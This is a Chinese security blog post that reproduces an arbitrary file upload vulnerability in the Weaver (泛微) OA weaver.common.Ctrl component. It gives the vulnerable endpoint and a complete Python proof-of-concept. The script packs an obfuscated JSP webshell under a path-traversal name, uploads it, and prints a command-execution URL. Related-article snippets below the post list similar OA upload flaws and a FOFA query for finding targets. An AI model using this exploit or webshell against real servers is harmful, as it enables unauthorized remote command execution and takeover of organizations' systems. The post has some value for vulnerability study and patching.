泛微OA 任意文件上传漏洞

最新推荐文章于 2025-03-16 20:41:43 发布
最新推荐文章于 2025-03-16 20:41:43 发布
阅读量7.6k 收藏 7
点赞数 1
分类专栏: 渗透测试自学日志之漏洞复现篇 文章标签: 安全 web安全
原文链接:https://mp.weixin.qq.com/s/WoWIZzY48C6GjCrbgnSErg
版权
本文详细介绍了泛微OA系统weaver.common.Ctrl组件存在的任意文件上传漏洞,攻击者可借此上传webshell,控制服务器。复现步骤包括定位漏洞路径并使用POC进行文件上传。此外,提供了Python脚本实现文件上传过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

使用需知

由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。
本文来源于PeiQi文库 ,作者PeiQi文库

一、漏洞描述

泛微OA weaver.common.Ctrl 存在任意文件上传漏洞,攻击者通过漏洞可以上传webshell文件控制服务器

二、漏洞影响

泛微OA

三、漏洞复现

存在漏洞的路径为

/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp

使用POC进行文件上传

python poc.py

在这里插入图片描述

四、漏洞POC

import zipfile
import random
import sys
import requests



def generate_random_str(randomlength=16):
    random_str = ''
    base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
    length = len(base_str) - 1
    for i in range(randomlength):
        random_str += base_str[random.randint(0, length)]
    return random_str

mm = generate_random_str(8)

webshell_name1 = mm+'.jsp'
webshell_name2 = '../../../'+webshell_name1

def file_zip():
    shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
    if(request.getParameter("cmd")!=null){
        BASE64Decoder decoder = new BASE64Decoder();
        Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
        Process e = (Process)
                rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
                        String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
                        Object[]{}), request.getParameter("cmd") );
        java.io.InputStream in = e.getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
    """   ## 替换shell内容
    zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
    zf.writestr(webshell_name2, shell)

def GetShell(urllist):
    file_zip()
    # print('上传文件中')
    urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'
    file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]
    try:
        requests.post(url=urls,files=file,timeout=60, verify=False)
        GetShellurl = urllist+'/cloudstore/'+webshell_name1
        GetShelllist = requests.get(url = GetShellurl)
        if GetShelllist.status_code == 200:
            print(GetShellurl+"?cmd=whoami")
    except:
        pass

GetShell("自己找的漏洞URL")
漏洞复现】CERIO DT系列路由器 远程代码执行漏洞
qq_67810151的博客
03-13 623
CERIO DT系列路由器在特定版本中存在操作命令注入漏洞。未授权的攻击者可利用该漏洞进行远程代码执行,从而控制服务器。
OA e-office平台uploadify.php任意文件上传漏洞
薛定谔嘚喵博客
10-07 1110
e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。 OA e-office平台uploadify.php处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
OA weaver.common.Ctrl 任意文件上传漏洞
DUANYU23的博客
05-17 4253
poc import zipfile import random import sys import requests def generate_random_str(randomlength=16): random_str = '' base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789' length = len(base_str) - 1 for i in range(randomlen
文件上传漏洞(详解)
最新发布
xiexierong的博客
03-16 936
将客户端数据以文件形式封装,通过网络协议发送到服务器端。在服务器端解析数据,最终在服务端硬盘上作为真实的文件保存。通常一个文件以HTTP协议进行上传时,将以POST请求发送至Web服务器,Web服务器收到请求并同意后,用户与Web服务器将建立连接,并传输数据。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,"文件上传"本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。
【严重】 e-cology <10.58.3 任意文件上传漏洞
murphysec的博客
08-04 1277
OSCS是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。社区开发者可以通过配置飞书、钉钉、企业信机器人获取一手的情报。 e-cology 10.58.3之前版本存在任意文件上传漏洞,由于上传接口身份认证缺失,未经过身份验证的攻击者可以构造恶意请求将文件上传至服务器,攻击者可能通过上传jsp文件,从而远程执行任意命令。协同管理应用平台(e-cology)是一套企业大型协同管理平台。
漏洞复现】 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
李火火的安全圈
11-29 5518
0x01 漏洞概述 e-office是旗下的一款标准的协同移动办公平台。 e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可利用该漏洞获取服务器控制权。 0x02 影响范围 e-office V9.0 0x03 漏洞复现 访问界面如下 ...
OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
Silentsoul04#vulnerability-paper-1#OA9前台任意文件上传1
07-25
OA9前台任意文件上传漏洞位于: /page/exportImport/uploadOperation.jsp文件中Jsp流程大概是:判断请求是否是mult
漏洞复现】OA e-office webservice 任意文件上传漏洞
qq_67810151的博客
04-25 1112
e-office /webservice/upload/upload.php接口存在任意文件上传漏洞。未收取的攻击者可以通过该漏洞上传恶意脚本文件,从而控制服务器。
漏洞复现】OA E-Office do_excel.php 任意文件写入漏洞
qq_48368964的博客
10-01 1559
OAE-Ofice do exce.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验,攻击者可以通过构造特定的请求,将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件,如 WebShel 或系统脚本,从而在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器。0-0fice是一款标准化的协同 OA办公软件,协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
突破防线!OA任意文件上传Getshell
平凡
08-16 912
子曰:“巧言令色,鲜矣仁。”
OA E-Office V10 OfficeServer 任意文件上传漏洞复现
故事讲予风听
10-20 3680
e-ofice是一款标准化的协同0A办公软件, E-ofice 10 0ficeServer 存在任意文件上传漏洞,攻击者可以上传任意文件,获取webshell,在服务器上执行任意命令、读取敏感信息等。
e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
Ms08067安全实验室
12-14 6258
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web漏洞挖掘班讲师)参考:https://cnvd.org.cn/flaw/show/CNVD-2021-49104 ...
[漏洞挖掘]SRC-OA文件上传
wwxxee
05-19 4331
SRC–OA任意文件上传 OA weaver.common.Ctrl 任意文件上传漏洞 存在漏洞的路径为: /weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp 首页: 请求包: FOFA: app=“-协同办公OA” && is_domain=true 普通注册会员只能获取5页信息。 有FOFA会员可以直接通过API请求拿到I
OA_lang2sql 任意文件上传漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-06 1028
OA E-mobile系统 lang2sql接口存在任意文件上传漏洞,由于后端源码中没有对文件没有校验,导致任意文件上传。攻击者可利用该参数构造恶意数据包进行上传漏洞攻击。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
二次开发 文件上传
weixin_48973977的博客
05-10 603
上述代码中 setFilecontent部分是设置文件的base64编码值 注(不需要解码再放进去 源码中有做解码操作!
【工具】通达漏洞综合利用工具v1.0
Wulai399的博客
06-06 729
通达漏洞综合利用工具v1.0
OAwebservice接口附件上传
StrivingSRC的博客
03-26 2222
requestName>工单升级</requestName>
漏洞通报:V9任意文件上传
热门推荐
土豆的博客
12-06 7万+
——D&X安全实验室 目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 (1)环境搭建 (2)构造POC (3)漏洞验证 Part5 修复建议 Part1 漏洞描述 e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。 该漏洞是由于后端源码中uploadType 参数设为 ...
oa文件上传漏洞
03-14
好的,我现在需要处理用户关于OA文件上传漏洞的查询。用户想了解漏洞的详情及修复方法。首先,我需要整理用户提供的引用内容,这些引用提到了三个不同的漏洞:do_excel.php、init.php和upload.php的任意文件上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值